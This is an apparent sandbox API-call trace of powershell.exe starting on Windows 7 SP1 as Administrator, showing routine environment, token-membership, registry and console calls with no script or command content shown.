	[0765.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.293] CoTaskMemFree (pv=0x3cba10) 
	[0765.296] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0765.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.296] CoTaskMemFree (pv=0x3cba10) 
	[0765.297] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0765.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.297] CoTaskMemFree (pv=0x3cba10) 
	[0765.300] CoCreateGuid (in: pguid=0x1ade48 | out: pguid=0x1ade48*(Data1=0xa6769b22, Data2=0xa180, Data3=0x4621, Data4=([0]=0xb0, [1]=0x61, [2]=0x58, [3]=0xa2, [4]=0x92, [5]=0xae, [6]=0xdc, [7]=0x67))) returned 0x0
	[0765.303] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0765.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.303] CoTaskMemFree (pv=0x3cba10) 
	[0765.306] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0765.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.306] CoTaskMemFree (pv=0x3cba10) 
	[0767.290] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0767.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.290] CoTaskMemFree (pv=0x3cba10) 
	[0767.304] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0767.306] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1adaf0 | out: lpConsoleScreenBufferInfo=0x1adaf0) returned 1
	[0767.326] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0768.725] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1adaf0 | out: lpConsoleScreenBufferInfo=0x1adaf0) returned 1
	[0768.726] GetVersionExW (in: lpVersionInformation=0x1ada80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ada80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0768.729] GetCurrentProcess () returned 0xffffffffffffffff
	[0768.730] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1adb18 | out: TokenHandle=0x1adb18*=0x31c) returned 1
	[0768.734] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ada38 | out: TokenInformation=0x0, ReturnLength=0x1ada38) returned 0
	[0768.735] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x317220
	[0768.736] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x317220, TokenInformationLength=0x4, ReturnLength=0x1ada38 | out: TokenInformation=0x317220, ReturnLength=0x1ada38) returned 1
	[0768.737] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1adb98 | out: phNewToken=0x1adb98*=0x318) returned 1
	[0768.738] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ada38 | out: TokenInformation=0x0, ReturnLength=0x1ada38) returned 0
	[0768.738] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x317340
	[0768.738] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x317340, TokenInformationLength=0x4, ReturnLength=0x1ada38 | out: TokenInformation=0x317340, ReturnLength=0x1ada38) returned 1
	[0768.739] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x2e7d938*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1adba8 | out: IsMember=0x1adba8) returned 1
	[0768.739] CloseHandle (hObject=0x318) returned 1
	[0768.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0768.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0768.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0768.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0769.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0769.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0769.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0769.815] CoTaskMemAlloc (cb=0x804) returned 0x1b821880
	[0769.815] GetConsoleTitleW (in: lpConsoleTitle=0x1b821880, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0769.816] CoTaskMemFree (pv=0x1b821880) 
	[0770.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0770.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0770.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0770.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0771.628] SetConsoleCtrlHandler (HandlerRoutine=0x20268dc, Add=1) returned 1
	[0771.639] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0771.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0771.639] CoTaskMemFree (pv=0x3cba10) 
	[0771.653] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0771.655] CoCreateGuid (in: pguid=0x1adc90 | out: pguid=0x1adc90*(Data1=0x4125fd8f, Data2=0x8e3d, Data3=0x4730, Data4=([0]=0x9e, [1]=0x5f, [2]=0x2c, [3]=0xf2, [4]=0xa, [5]=0x29, [6]=0x1, [7]=0x2c))) returned 0x0
	[0771.656] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0771.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0771.656] CoTaskMemFree (pv=0x3cba10) 
	[0772.581] WinSqmIsOptedIn () returned 0x0
	[0772.581] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0772.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.581] CoTaskMemFree (pv=0x3cba10) 
	[0772.582] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0772.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.582] CoTaskMemFree (pv=0x3cba10) 
	[0772.583] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0772.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.583] CoTaskMemFree (pv=0x3cba10) 
	[0772.584] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0772.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.584] CoTaskMemFree (pv=0x3cba10) 
	[0772.584] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0772.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.585] CoTaskMemFree (pv=0x3cba10) 
	[0772.586] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0772.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.586] CoTaskMemFree (pv=0x3cba10) 
	[0772.586] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0772.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.587] CoTaskMemFree (pv=0x3cba10) 
	[0772.587] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0772.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.587] CoTaskMemFree (pv=0x3cba10) 
	[0772.590] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0772.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.590] CoTaskMemFree (pv=0x3cba10) 
	[0774.600] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0774.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0774.600] CoTaskMemFree (pv=0x3cba10) 
	[0774.600] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0774.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0774.600] CoTaskMemFree (pv=0x3cba10) 
	[0774.601] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0774.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0774.601] CoTaskMemFree (pv=0x3cba10) 
	[0778.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0787.053] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0787.053] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0787.053] CoTaskMemFree (pv=0x3cba10) 
	[0787.065] CoTaskMemAlloc (cb=0xcc) returned 0x1b810c10
	[0787.065] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b810c10, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0787.066] CoTaskMemFree (pv=0x1b810c10) 
	[0787.066] CoTaskMemAlloc (cb=0xf0) returned 0x1b81adb0
	[0787.066] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b81adb0, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0787.066] CoTaskMemFree (pv=0x1b81adb0) 
	[0787.066] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad808 | out: phkResult=0x1ad808*=0x304) returned 0x0
	[0787.066] RegQueryValueExW (in: hKey=0x304, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad78c, lpData=0x0, lpcbData=0x1ad788*=0x0 | out: lpType=0x1ad78c*=0x2, lpData=0x0, lpcbData=0x1ad788*=0x6c) returned 0x0
	[0787.066] CoTaskMemAlloc (cb=0x70) returned 0x3504e0
	[0787.066] RegQueryValueExW (in: hKey=0x304, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad75c, lpData=0x3504e0, lpcbData=0x1ad758*=0x6c | out: lpType=0x1ad75c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ad758*=0x6c) returned 0x0
	[0787.066] CoTaskMemFree (pv=0x3504e0) 
	[0787.066] CoTaskMemAlloc (cb=0xcc) returned 0x1b810c10
	[0787.066] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b810c10, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0787.066] CoTaskMemFree (pv=0x1b810c10) 
	[0787.066] CoTaskMemAlloc (cb=0xcc) returned 0x1b810c10
	[0787.066] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b810c10, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0787.067] CoTaskMemFree (pv=0x1b810c10) 
	[0788.080] RegCloseKey (hKey=0x304) returned 0x0
	[0788.080] CoTaskMemAlloc (cb=0xcc) returned 0x1b810c10
	[0788.080] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b810c10, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0788.080] CoTaskMemFree (pv=0x1b810c10) 
	[0788.081] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad808 | out: phkResult=0x1ad808*=0x304) returned 0x0
	[0788.081] RegQueryValueExW (in: hKey=0x304, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad78c, lpData=0x0, lpcbData=0x1ad788*=0x0 | out: lpType=0x1ad78c*=0x0, lpData=0x0, lpcbData=0x1ad788*=0x0) returned 0x2
	[0788.081] RegCloseKey (hKey=0x304) returned 0x0
	[0788.094] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0788.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.094] CoTaskMemFree (pv=0x3cba10) 
	[0788.097] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0788.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.097] CoTaskMemFree (pv=0x3cba10) 
	[0788.101] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0788.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.101] CoTaskMemFree (pv=0x3cba10) 
	[0788.101] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0788.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.101] CoTaskMemFree (pv=0x3cba10) 
	[0788.103] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad5f8 | out: phkResult=0x1ad5f8*=0x304) returned 0x0
	[0788.104] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x1ad60c, lpData=0x0, lpcbData=0x1ad608*=0x0 | out: lpType=0x1ad60c*=0x1, lpData=0x0, lpcbData=0x1ad608*=0x74) returned 0x0
	[0788.104] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x1ad57c, lpData=0x0, lpcbData=0x1ad578*=0x0 | out: lpType=0x1ad57c*=0x1, lpData=0x0, lpcbData=0x1ad578*=0x74) returned 0x0
	[0788.104] CoTaskMemAlloc (cb=0x78) returned 0x3504e0
	[0788.104] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x1ad54c, lpData=0x3504e0, lpcbData=0x1ad548*=0x74 | out: lpType=0x1ad54c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad548*=0x74) returned 0x0
	[0788.104] CoTaskMemFree (pv=0x3504e0) 
